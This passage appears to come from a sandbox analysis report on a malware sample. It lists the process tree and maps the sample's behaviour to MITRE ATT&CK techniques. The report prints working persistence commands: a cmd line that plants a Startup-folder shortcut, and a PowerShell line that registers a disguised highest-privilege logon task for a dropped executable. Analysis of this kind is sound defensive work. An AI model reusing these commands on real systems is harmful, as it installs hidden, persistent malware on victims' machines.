  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureCloud Harbor Inc\SafeHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & exit
  2⤵
  PID:9168
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:15448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:19668

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:18968

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:23924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 6136 -ip 6136
1⤵
PID:7088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 24260 -ip 24260
1⤵
PID:7372

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:10908

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:26312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 25436 -ip 25436
1⤵
PID:26576

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:7908

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:36044

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:36184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 12888 -ip 12888
1⤵
PID:12992

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
PID:31108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 35200 -ip 35200
1⤵
PID:33840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 35200 -ip 35200
1⤵
PID:14968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k DcomLaunch
1⤵
PID:38320

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:39504

C:\ProgramData\ljgx\fgihp.exe
C:\ProgramData\ljgx\fgihp.exe
1⤵
PID:2144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery